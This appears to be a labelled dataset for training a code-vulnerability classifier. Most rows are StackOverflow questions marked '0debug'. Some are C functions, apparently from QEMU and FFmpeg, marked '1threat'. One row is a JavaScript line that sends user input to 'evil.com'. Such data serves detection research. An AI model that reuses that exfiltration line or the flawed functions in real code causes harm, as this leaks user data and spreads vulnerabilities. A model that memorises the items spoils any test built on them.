problem
stringlengths
26
131k
labels
class label
2 classes
Arrow functions best practice? : <p>Is it best practice to use arrow functions, when the function takes one parameter?</p> <p>I was told to use something like this</p> <pre><code>const volumeOfSphere = diameter =&gt; (1/6) * Math.PI * diameter * diameter * diameter; </code></pre> <p>Rather than this</p> <pre><c...
0debug
What is the logic behind Python's and operator? : <p>From Python:</p> <pre><code>&gt;&gt;&gt; 1 and 2 2 &gt;&gt;&gt; 1 and 2 and 3 3 &gt;&gt;&gt; 3 and 2 and 1 1 &gt;&gt;&gt; 'a' and 'b' 'b' </code></pre> <p>Why Python returns these result? What is the logic for that when dealing with pure numbers or strings?</p>
0debug
static void *qemu_tcg_rr_cpu_thread_fn(void *arg) { CPUState *cpu = arg; rcu_register_thread(); qemu_mutex_lock_iothread(); qemu_thread_get_self(cpu->thread); CPU_FOREACH(cpu) { cpu->thread_id = qemu_get_thread_id(); cpu->created = true; cpu->can_do_io = 1; ...
1threat
How to calculate differences between consecutive rows in pandas data frame? : <p>I've got a data frame, <code>df</code>, with three columns: <code>count_a</code>, <code>count_b</code> and <code>date</code>; the counts are floats, and the dates are consecutive days in 2015.</p> <p>I'm trying to figure out the differenc...
0debug
Array Reverse is not working for me ... : <p>Consider the following code (React JS code):</p> <pre><code> poll() { var self = this; var url = "//" + location.hostname + "/api/v1/eve/history/historical-data/" + this.state.itemId + '/' + this.state.regionId + '/40'; $.get(url, function(result) { ...
0debug
SwipeRefreshLayout intercepts with ViewPager : <p>I have a ViewPager wrapped inside a SwipeRefreshLayout. Sometimes, when I swipe to the left/right the SRL get's triggered. This mostly happens when I'm at the top of my fragment. </p> <p>How do I solve this? Do I need to listen to some kind of event in order to disabl...
0debug
VS Code Key Binding for quick switch between terminal screens? : <p>I'm trying to figure out if there is a way to set up a key binding to allow a quick switch between the terminal windows I have open in the built in terminal rather than having to click on the drop down selector each time. Does anyone know the command f...
0debug
Huge white gap in header when slimming page to mobile view : <p>If you go to this page (<a href="https://www.comparestonehengetours.com/" rel="nofollow noreferrer">https://www.comparestonehengetours.com/</a>) in Mobile or Tablet View the logo has loads of white space on top of it. Is there any way to remove all the whi...
0debug
how to hide the path in website url using php : I have no idea of url coding please help me out. To Complete the stackoverflow validation i am just writing some random code, please ignore this. RewriteEngine On RewriteCond %{HTTP_HOST} ^www.yourdomain.com RewriteRule (.*) http://yourdomain.com/$1 [R=301,L] Rew...
0debug
def answer(L,R): if (2 * L <= R): return (L ,2*L) else: return (-1)
0debug
Mysql (MariaDB 10.0.29): Set root password, but still can login without asking password? : <p>I want to secure mysql by setting root password. I reset root password successfully:</p> <pre><code>MariaDB [(none)]&gt; select Host, User, Password from mysql.user; +-----------+------+---------------------------------------...
0debug
Your app uses the “prefs:root=” non public URL scheme. Best plan to update old code? : <p>so I posted previously about this issue <a href="https://stackoverflow.com/questions/53755550/ios-app-store-rejection-your-app-uses-the-prefsroot-non-public-url-scheme?noredirect=1#comment94365312_53755550">here.</a></p> <p>As yo...
0debug
static int cdxl_decode_frame(AVCodecContext *avctx, void *data, int *got_frame, AVPacket *pkt) { CDXLVideoContext *c = avctx->priv_data; AVFrame * const p = data; int ret, w, h, encoding, aligned_width, buf_size = pkt->size; const uint8_t *buf = pkt->data; if (b...
1threat
How to send an notification 15 days after user opens the app for the first time : <p>Hey is there anyway to send an notification every 15 day after the first time user opens the app ? Thanks in advance</p>
0debug
opening image file on c++ , PNG , JPEG : <p>I have tried to open bg.png file , but didn't work. There is no error , but nothing appears. Help Me!</p> <pre><code>int main() { initwindow(600,600,"GAME"); ifstream image("bg.png"); getimage(50, 50 , 450 , 450 , image); putimage(50,50,im...
0debug
Array Sum Of All Elements? : I have an Array A with size N. I want to make a new array of size N*N such that my new Array B will be as follow with Time Complexity less than O(n^2): For A[0..N-1] , B= {A[0]+A[1], A[0]+A[2], ……., A[1]+A[0], A[1]+A[2], ……., A[N-1]+A[0], A[N-1]+A[1],..., A[N-1]+A[N-1]}. Example: A={1,2...
0debug
Angular 2 New Router: Change / Set Query Params : <p>I have a component registered at <code>/contacts</code>, which displays a list of contacts. I've added an <code>&lt;input [value]="searchString"&gt;</code> for filtering the displayed list.</p> <hr> <p>Now I'd like to display the <code>searchString</code> within th...
0debug
static bool bdrv_drain_recurse(BlockDriverState *bs) { BdrvChild *child; bool waited; waited = BDRV_POLL_WHILE(bs, atomic_read(&bs->in_flight) > 0); if (bs->drv && bs->drv->bdrv_drain) { bs->drv->bdrv_drain(bs); } QLIST_FOREACH(child, &bs->children, next) { waited ...
1threat
get responseText in ajax : <p>I just want to get ajax feedback</p> <pre><code>var result = $.ajax({ url : 'linkAPI', type : 'get', dataType: 'JSON' }); console.log(result); </code></pre> <p>and only responseTEXT appears.</p> <pre><code>Console.l...
0debug
Custom Card Shape Flutter SDK : <p>I just started learning Flutter and I have developed an app with GridView. GridView items are Card. Default card shape is Rectangle with a radius of 4.</p> <p>I know there is shape property for Card Widget and it takes ShapeBorder class. But I am unable to find how to use ShapeBorder...
0debug
.toggle is not a function : <p>In my website I have a lot of buttons. When the page loads, I need the first button to be clicked.</p> <p>I tried getting the first button and then using the function .toggle('click').</p> <p>var $btn = $('.btn-personalizar-tamanho')[0]; if($btn != undefined) $btn.toggle('click');</p> ...
0debug
static int commit_bitstream_and_slice_buffer(AVCodecContext *avctx, DECODER_BUFFER_DESC *bs, DECODER_BUFFER_DESC *sc) { const struct MpegEncContext *s = avctx->priv_data; AVDXVAContext *ctx = avctx->hwaccel_context; ...
1threat
Creating multiple bundles using angular-cli webpack : <p>When i build the project using angular-cli, it bundles all project files into one big main bundle.</p> <p>I have used lazy routing in the application and i can navigate fine once application loads up.</p> <p>Is there a way in which main bundle is divided into m...
0debug
static int unin_main_pci_host_init(PCIDevice *d) { pci_config_set_vendor_id(d->config, PCI_VENDOR_ID_APPLE); pci_config_set_device_id(d->config, PCI_DEVICE_ID_APPLE_UNI_N_PCI); d->config[0x08] = 0x00; pci_config_set_class(d->config, PCI_CLASS_BRIDGE_HOST); d->config[0x0C] = 0x08; d->con...
1threat
static int xan_decode_frame(AVCodecContext *avctx, void *data, int *data_size, uint8_t *buf, int buf_size) { XanContext *s = avctx->priv_data; AVPaletteControl *palette_control = avctx->palctrl; int keyframe = 0; if (palette_control->palet...
1threat
static void apply_loop_filter(Vp3DecodeContext *s) { int x, y, plane; int width, height; int fragment; int stride; unsigned char *plane_data; int bounding_values_array[256]; int *bounding_values= bounding_values_array+127; int filter_limit; for (x = 63; x >= 0; x-...
1threat
Get the id of the clicked link : <p><strong>I'd like to get the id of the clicked link with jQuery.</strong> Why does this return <code>Undefined</code> instead?</p> <p><div class="snippet" data-lang="js" data-hide="false"> <div class="snippet-code"> <pre class="snippet-code-js lang-js prettyprint-override"><code>te...
0debug
MongoError: The $subtract accumulator is a unary operator : <p>I can't seem to find any solutions for this problem. I just can't figure out what is wrong.</p> <p>I already tried this <a href="https://stackoverflow.com/questions/46722968/mongo-subtract-in-group-aggregation">Mongo subtract in group aggregation</a> but n...
0debug
variable changes when using if statement : <p>I've just started learning php an hour ago. I've made this code:</p> <pre><code>$x=2; $y=4; echo $x; echo $y; if($x=5) { echo "$x"; } else { echo "test"; } </code></pre> <p>I'm expecting the output: 24test</p> <p>I'm getting the output: 24...
0debug
Is there an API to detect which theme the OS is using - dark or light (or other)? : <h2>Background</h2> <p>On recent Android versions, ever since Android 8.1, the OS got more and more support for themes. More specifically dark theme.</p> <h2>The problem</h2> <p>Even though there is a lot of talk about dark mode in t...
0debug
static int gdb_get_avr_reg(CPUState *env, uint8_t *mem_buf, int n) { if (n < 32) { #ifdef WORDS_BIGENDIAN stq_p(mem_buf, env->avr[n].u64[0]); stq_p(mem_buf+8, env->avr[n].u64[1]); #else stq_p(mem_buf, env->avr[n].u64[1]); stq_p(mem_buf+8, env->avr[n].u64[0]); #endif ...
1threat
find_c_packed_planar_out_funcs(SwsContext *c, yuv2planar1_fn *yuv2yuv1, yuv2planarX_fn *yuv2yuvX, yuv2packed1_fn *yuv2packed1, yuv2packed2_fn *yuv2packed2, yuv2packedX_fn *yuv2packedX) { enum PixelFormat dstFormat =...
1threat
void ff_wmv2_idct_c(short * block){ int i; for(i=0;i<64;i+=8){ wmv2_idct_row(block+i); } for(i=0;i<8;i++){ wmv2_idct_col(block+i); } }
1threat
Is there a way I can left pad a number in C#? : <p>I have this code:</p> <pre><code>phrasesPage.Title = "Timer: " + AS.timerSeconds.ToString(); </code></pre> <p>The number of seconds can be anything from 120 to 0. Is there a way that I can have that display as "Timer: " plus the numbers 120 ... 099 .. 002 ... 001 .....
0debug
void aio_set_event_notifier(AioContext *ctx, EventNotifier *e, EventNotifierHandler *io_notify) { AioHandler *node; QLIST_FOREACH(node, &ctx->aio_handlers, node) { if (node->e == e && !node->deleted) { break; } } ...
1threat
How to Run Different Product Flavors in Android Studio : <p>I'm writing my first android app, and I'm just getting started with product flavors. I have an ad-supported app in beta, and I'm writing a paid version with no ads. I can compile both flavors, I think. When I open the gradle window, I see targets like "comp...
0debug
this is very simple program of collection but not running : <p>I am using latest jdk to run this program. i cant find the right solution here pls help.</p> <pre><code>import java.util.ArrayList; import java.util.Iterator; import java.util.List; class ArrayListDemo{ List&lt;String&gt; list = new ArrayList&lt;&gt;(...
0debug
how to do average in R or xcel : I have a big data set something like this below image length angle DSC_0001.JPG 13 22.619865 DSC_0001.JPG 21.470911 27.758541 DSC_0001.JPG 10.198039 11.309933 DSC_0001.JPG 115.97414 60.561512 DSC_0001.JPG 16.27882 79.38035 DSC_0001.JPG 22.803509 15.25511...
0debug
av_cold int ff_MPV_common_init(MpegEncContext *s) { int i; int nb_slices = (HAVE_THREADS && s->avctx->active_thread_type & FF_THREAD_SLICE) ? s->avctx->thread_count : 1; if (s->encoding && s->avctx->slices) nb_slices = s->avctx->slices; if (s-...
1threat
How to login webmail with Python ? : import requests import webbrowser s = requests.session() login_data = dict(username='***********', password= '*******') s.post("https://webmail..........................) webbrowser.get(using='chrome').open("https://webmail..........
0debug
How to take particular key value pairs from json array : <p>I have a large amount of data in JSON array format. A shorter version of which is as shown below</p> <pre><code>[{"Item": "Item1", "Unit CP": 100, "Unit SP": 150, "Quantity": 1, "TotalSP": 150}, {"Item": "Item2", "Unit CP": 50, "Unit SP": 70, "Quantity": 7, "...
0debug
C# ASP get path string without user having to select a file : Friends, I want to use the equivalence of open file dialog box in windows forms (FolderBrowserDialog) in asp. I see the FileUpload class but the user is still forced to select a file. I only want the directory portion.
0debug
Golang: unit testing os.File.Write call : I want to unit test a function that calls `os.File.Write()` and want 100% coverage. This function returns `n` and an error. Inducing an error is easy. All I need is to close the file. How can I induce no write error and a value `n` different of the written data length ? ...
0debug
int udp_set_remote_url(URLContext *h, const char *uri) { UDPContext *s = h->priv_data; char hostname[256]; int port; url_split(NULL, 0, hostname, sizeof(hostname), &port, NULL, 0, uri); if (resolve_host(&s->dest_addr.sin_addr, hostname) < 0) return AVERROR_IO; s->de...
1threat
Python weird loop in a CSV file parser : I have a Python that is going to read every **x** seconds a CSV file. what I do is: Open the file, read the info as CSV, loop every entry this is done in this PythonFile_: import csv import time import datetime CSV_PLAN = "./XoceKochPlan.csv" chargePlanF...
0debug
Is there an href attribute to add a contact, like “mailto:” or “tel:”? : <p>I want to add a contact to the user smartphone (like when someone send you a contact via WhatsApp) on a website.</p>
0debug
Autofac IComponentContext vs ILifetimeScope : <p>I was passing the IContainer in a service so I read that it is not good to pass this around but instead use it only to the root of the app and pass either IComponentContext or ILifetimeScope . So I am trying to understand which shall I use IComponentContext or ILifetimeS...
0debug
Regex R lookbehind : <p>How can I find the <code>n</code> words before the <code>colon</code> in this string in <code>R</code>? I'm using <code>stringr</code> but would regular expressions would be prefered.</p> <pre><code>Input on income economic activities: Small business, self-emp… </code></pre> <p>Thanks, E.</p>
0debug
Setting NSUnderlineStyle causes unrecogognized selector exception : <p>I am trying to underline a string with NSAttributed string. For some reason, my lines cause the exception: </p> <pre><code>-[_SwiftValue _getValue:forType:]: unrecognized selector sent to instance </code></pre> <p>The result is supposed to be u...
0debug
Why does Java 12 try to convert the result of a switch to a number? : <p>I agree that this code:</p> <pre><code>var y = switch (0) { case 0 -&gt; '0'; case 1 -&gt; 0.0F; case 2 -&gt; 2L; case 3 -&gt; true; default -&gt; 4; }; System.out.println(y); System.out.println(((Object) y).getClass().getName...
0debug
Conversion from `java.time.Instant` to `java.util.Date` adds UTC offset : <p>I seem to misunderstand <code>java.util.Date</code>'s conversion from and to <code>java.time.Instance</code>. I have some legacy code I need to ineract with, and this code uses <code>java.util.Date</code> in its API.</p> <p>I am slightly conf...
0debug
how to convert .bat file (batch) to .cmd file : i need a convert .bat file to .cmd file i have a file .bat and i want convert it to .cmd ex : rem^ &@echo off rem^ &call :'sub rem^ &exit /b :'sub rem^ &echo begin batch rem^ &cscript //nologo //e:vbscript "%~f0" rem^ &echo end batc...
0debug
How can I do a telnet to a local HTTP server? : <p>I know how to do it to a remote server, it would be like: </p> <pre><code>telnet www.esqsoft.globalservers.com 80 </code></pre> <p>But I don't know to a local server (written in C).</p>
0debug
Best way to create an account system in C# : <p>I am trying to create a system like LinkedIn but a simplified one. I tried doing so, but I came to realization that it will not be possible until I create something like an account system because at the moment the user will login - ok but then what? How is he going to be ...
0debug
size_t v9fs_marshal(struct iovec *in_sg, int in_num, size_t offset, int bswap, const char *fmt, ...) { int i; va_list ap; size_t old_offset = offset; va_start(ap, fmt); for (i = 0; fmt[i]; i++) { switch (fmt[i]) { case 'b': { uint8_t val = ...
1threat
Real devices not showing in android studio : <p>Hi i am trying to run my app through usb i have turned on debug mode also install via usb but after connecting device to android studio i am not able to show the device in android studio Any help?</p> <p><a href="https://i.stack.imgur.com/ZjcOV.png" rel="nofollow norefer...
0debug
PHP: Merge three variables (year, month, day) into one date : <p>I have three variables:</p> <p>1.) $year (e.g. "2018"),</p> <p>2.) $month (e.g. "9" or "12"),</p> <p>3.) $day (e.g. "5" or "21").</p> <p>I want to merge them into one single variable ($date) in the format of YYYY-mm-dd, i.e. "2018-09-14".</p> <p>Note...
0debug
regrex required for fetching value in </span> : I need a regex for fetching the value in the </span> tag <span class="booking-id-value">U166097</span value required =U166097 can please someone suggest me. I have tried using <span class="booking-id-value">(.+?) but it is not deriving the desired result it disp...
0debug
java buble sort code problems : Write a computer program that prompts the user for a number, creates an array for that number of random integers, and then uses the bubble sort to order the array. The program should print out the array prior to the call to the sorting algorithm and afterwards. I have most of the bub...
0debug
static int decode_blocks_ind(ALSDecContext *ctx, unsigned int ra_frame, unsigned int c, const unsigned int *div_blocks, unsigned int *js_blocks) { unsigned int b; ALSBlockData bd = { 0 }; bd.ra_block = ra_frame; bd.const_block ...
1threat
How can I use "Apply Changes" if I use Crashlytics? : <p>I'm using Android Studio 3.5 Beta 1. I decided to try out "Apply Changes". Instant Run was problematic, so we've had it disabled for years. I hoped that this would work better.</p> <p>If I try the "Apply Code Changes" button, I get an error in the Run window:</p...
0debug
static BlockDriverAIOCB *raw_aio_writev(BlockDriverState *bs, int64_t sector_num, QEMUIOVector *qiov, int nb_sectors, BlockDriverCompletionFunc *cb, void *opaque) { return bdrv_aio_writev(bs->file, sector_num, qiov, nb_sectors, cb, opaque); }
1threat
Ambigious use of subscript compiler error : function below is for ELCImagePicker to pick multiple images and I added my code to, the code used to run probably and suddenly after installing Parse SDK it gave error "Ambigious use of subscript" at this line of code : if let image = item[UIImagePickerControllerOriginalIma...
0debug
Difference between InheritableThreadLocal<ConcurrentMap> vs InheritableThreadLocal<OwnCacheStorageEntity>? : I have two implementations of an `InheritableThreadLocal` cache. private final InheritableThreadLocal<CacheEntity<T>> cacheMap; @Inject public RequestCache() { this.cacheMap = new Inh...
0debug
Does this code read the first 10000 lines from a file? : <pre><code>def read_text(bz2_loc, n=10000): with BZ2File(bz2_loc) as file_: for i, line in enumerate(file_): data = json.loads(line) yield data["body"] if i &gt;= n: break </code></pre> <p>I think i...
0debug
static int vnc_start_tls(struct VncState *vs) { static const int cert_type_priority[] = { GNUTLS_CRT_X509, 0 }; static const int protocol_priority[]= { GNUTLS_TLS1_1, GNUTLS_TLS1_0, GNUTLS_SSL3, 0 }; static const int kx_anon[] = {GNUTLS_KX_ANON_DH, 0}; static const int kx_x509[] = {GNUTLS_KX_DHE_DSS...
1threat
PHP dates query malfunctioning : I cannot understand why the following isn't working, and I suspect its something to do with my 'Date' format? SELECT * FROM Scans WHERE (Date BETWEEN '$sdate' AND '$edate') $sdate and $edate are defined dates in format of 01/01/2018. This is also how they are stored in the dat...
0debug
int MPV_frame_start(MpegEncContext *s, AVCodecContext *avctx) { int i; Picture *pic; s->mb_skipped = 0; assert(s->last_picture_ptr==NULL || s->out_format != FMT_H264 || s->codec_id == CODEC_ID_SVQ3); if (s->pict_type != FF_B_TYPE && s->last_picture_ptr && s->last_picture_ptr != s->ne...
1threat
webpack 4 - split chunks plugin for multiple entries : <p>Using <a href="https://webpack.js.org/plugins/split-chunks-plugin/" rel="noreferrer">split chunks plugin</a> with the following config :</p> <pre><code>{ entry: { entry1: [entry1.js], entry2: [entry2.js], entry3: [entry3.js], ...
0debug
Node.js Socket.io page refresh multiple connections : <p>i have this simple node.js Servercode using socket.io (1.5):</p> <pre><code>var io = require('socket.io').listen(8080); io.on('connection', function(socket) { console.log(' %s sockets connected', io.engine.clientsCount); socket.on('disconnect', functi...
0debug
Firebase Cloud Function Repeatedly Fails Due to Quota Error : <p>I have a Firebase Cloud Function that is triggered by an <code>onCreate</code> at a path in my Realtime database. Yesterday, after doing some basic testing, I began to get "quota exceeded" errors in the Cloud Functions Log. What was troubling though, is t...
0debug
Convert Graphql to SQL? : <p>We have existing SQL Server database and we are using C#. Lets say our mobile client send a graphql to server. How can I convert this SQL, so that my client get the data what he expect?</p>
0debug
static int mxf_write_footer(AVFormatContext *s) { MXFContext *mxf = s->priv_data; AVIOContext *pb = s->pb; mxf->duration = mxf->last_indexed_edit_unit + mxf->edit_units_count; mxf_write_klv_fill(s); mxf->footer_partition_offset = avio_tell(pb); if (mxf->edit_unit_byte_count) { ...
1threat
Can not find module “@angular-devkit/build-angular” : <p>Using npm, I followed the getting started directions on the Angular CLI quick start page. </p> <p><a href="https://angular.io/guide/quickstart" rel="noreferrer" title="Angular CLI Quickstart">Angular CLI Quickstart</a></p> <p>Running <code>ng serve --open</code...
0debug
av_cold int ff_vc1_decode_init_alloc_tables(VC1Context *v) { MpegEncContext *s = &v->s; int i; int mb_height = FFALIGN(s->mb_height, 2); v->mv_type_mb_plane = av_malloc (s->mb_stride * mb_height); v->direct_mb_plane = av_malloc (s->mb_stride * mb_height); v->forward_mb_plane = av...
1threat
static void vp8_decode_mv_mb_modes(AVCodecContext *avctx, VP8Frame *curframe, VP8Frame *prev_frame) { VP8Context *s = avctx->priv_data; int mb_x, mb_y; s->mv_min.y = -MARGIN; s->mv_max.y = ((s->mb_height - 1) << 6) + MARGIN; for (mb_y = 0; mb_y < s->mb_hei...
1threat
The server returned HTTP 400 Bad Request. Response body: [b'{"ok":false,"error_code":400,"description":"Bad Request: message can\'t be deleted"}']" : Добрый день, при попытке удалить сообщение моим ботом, выдается ошибка: 2018-04-10 13:58:57,646 (__init__.py:292 MainThread) ERROR - TeleBot: "A request to the Telegr...
0debug
static int rd_frame(CinepakEncContext *s, AVFrame *frame, unsigned char *buf, int buf_size) { int num_strips, strip, h, i, y, size, temp_size, best_size; AVPicture last_pict, pict, scratch_pict; int64_t best_score = 0, score, score_temp; for(num_strips = MIN_STRIPS; num_strips <= MAX_STRIPS...
1threat
int qemu_set_fd_handler(int fd, IOHandler *fd_read, IOHandler *fd_write, void *opaque) { return qemu_set_fd_handler2(fd, NULL, fd_read, fd_write, opaque); }
1threat
static void validate_test_add(const char *testpath, TestInputVisitorData *data, void (*test_func)(TestInputVisitorData *data, const void *user_data)) { g_test_add(testpath, TestInputVisitorData, data, NULL, test_func, validate_teardow...
1threat
How/where C++ namespace std is defined (link to documentation/standard) : <p>This question seems to have been asked many times before but the answers just poo-poo or pee-pee around the issue. I want to find a source in official documentation and standards where this issue is addressed. Apparently, "std" is implied by t...
0debug
QTestState *qtest_init_without_qmp_handshake(const char *extra_args) { QTestState *s; int sock, qmpsock, i; gchar *socket_path; gchar *qmp_socket_path; gchar *command; const char *qemu_binary; qemu_binary = getenv("QTEST_QEMU_BINARY"); g_assert(qemu_binary != NULL); s = g_malloc(size...
1threat
Turn formatted String into Date : <p>So I have a Date variable which I formatted using the following code:</p> <pre><code>SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); Date currentDate = new Date(); String date = format.format(currentDate); </code></pre> <p>I then put the String 'date' into ...
0debug
static int64_t run_opencl_bench(AVOpenCLExternalEnv *ext_opencl_env) { int i, arg = 0, width = 1920, height = 1088; int64_t start, ret = 0; cl_int status; size_t kernel_len; char *inbuf; int *mask; int buf_size = width * height * sizeof(char); int mask_size = sizeof(uint32_t) * ...
1threat
How do I merge two tables in sql server SPECIFICALLY using WINDOWS FORM C# and not SQL : I have two tables: StudentSection1 with the following fields and information: StudentID (int)(PK) StudentName (varchar(100)) StudentGender (varchar(100)) 1 Henry ...
0debug
document.location = 'http://evil.com?username=' + user_input;
1threat
When should we use Web SQL or IndexedDB? What are the use cases? : <p>Recently I have come across Web SQL and IndexedDB provided by browsers. I want to understand the use cases when these can be used.</p>
0debug
static int nbd_send_negotiate(NBDClient *client) { int csock = client->sock; char buf[8 + 8 + 8 + 128]; int rc; const int myflags = (NBD_FLAG_HAS_FLAGS | NBD_FLAG_SEND_TRIM | NBD_FLAG_SEND_FLUSH | NBD_FLAG_SEND_FUA); qemu_se...
1threat
static int omap2_validate_addr(struct omap_mpu_state_s *s, target_phys_addr_t addr) { return 1; }
1threat
static int ffm2_read_header(AVFormatContext *s) { FFMContext *ffm = s->priv_data; AVStream *st; AVIOContext *pb = s->pb; AVCodecContext *codec, *dummy_codec = NULL; AVCodecParameters *codecpar; const AVCodecDescriptor *codec_desc; int ret; int f_main = 0, f_cprv = -1, f_stvi = -...
1threat
Laravel How to display $hidden attribute on model on paginate : <p>I'm using Laravel 5.5. I read about this and know this function and it works <a href="https://laravel.com/docs/5.5/eloquent-serialization#hiding-attributes-from-json" rel="noreferrer">makeVisible</a> </p> <pre><code>$hidden = ['password', 'remember_tok...
0debug
Selenium unable to locate my elements(buttons) : <p>I want to press buttons using selenium, i faced an issue yesterday where i couldn't and simply turned out that my button is inside an iframe circling the entire webpage. this fixed it:</p> <pre><code>from time import sleep driver.switch_to.frame(driver.find_element_b...
0debug
I'm trying to create a javascript to return different answers for a radio button. : I'm trying to create a javascript to return different answers for a radio button. I have set up the html for a radio button form like this: <ul> <li> <h5>Does the PURPLE card have your number?</h5> <input type="r...
0debug
how to extract data in between parathasis and append at the end of the line using python programing. : File.txt first_name NVARCHAR2(15) NOT NULL, middle_name NVARCHAR2(20) NOT NULL, last_name NVARCHAR2(11) NOT NULL, output i need:->output.txt first_name NVARCHAR2(15) NOT NULL,15 middle_name NVARCHAR2(20) NOT...
0debug
D3.js add heading to graph : I want to add heading to my graph. Something like this : [What i want to achieve...][1] I have tried append.svg , append.text....etc but nothing seems to work. I,m just not able to write the correct CSS for this i guess. This code here works: header= d3.select("svg").appen...
0debug
static void spitz_gpio_setup(PXA2xxState *cpu, int slots) { qemu_irq lcd_hsync; spitz_hsync = 0; lcd_hsync = qemu_allocate_irqs(spitz_lcd_hsync_handler, cpu, 1)[0]; pxa2xx_gpio_read_notifier(cpu->gpio, lcd_hsync); pxa2xx_lcd_vsync_notifier(cpu->lcd, lcd_hsync); pxa...
1threat
How to remove one polyline of several with jquery.ui.map : <p> I have two polylines on the gmap:<br /> Polyline 1 as 'route'<br /> Polyline 2 as 'other'<br /> i want to clear only one. How can i do that?<br /> I have tried with $('#map_canvas').gmap('clear', 'overlays > Polyline').route<br /> but it does not work...
0debug
void msix_notify(PCIDevice *dev, unsigned vector) { MSIMessage msg; if (vector >= dev->msix_entries_nr || !dev->msix_entry_used[vector]) return; if (msix_is_masked(dev, vector)) { msix_set_pending(dev, vector); return; } msg = msix_get_message(dev, vector); ...
1threat
static inline void downmix_3f_2r_to_stereo(float *samples) { int i; for (i = 0; i < 256; i++) { samples[i] += (samples[i + 256] + samples[i + 768]); samples[i + 256] = (samples[i + 512] + samples[i + 1024]); samples[i + 512] = samples[i + 768] = samples[i + 1024] = 0; } }
1threat
Google Map API not rendering because of invalid Lng value : <p>The google maps api will not render a map because it says the co ordinates I have given in the lat and long sections is not a number. Returning this console error</p> <p>InvalidValueError: setCenter: not a LatLng or LatLngLiteral: in property lng: not a nu...
0debug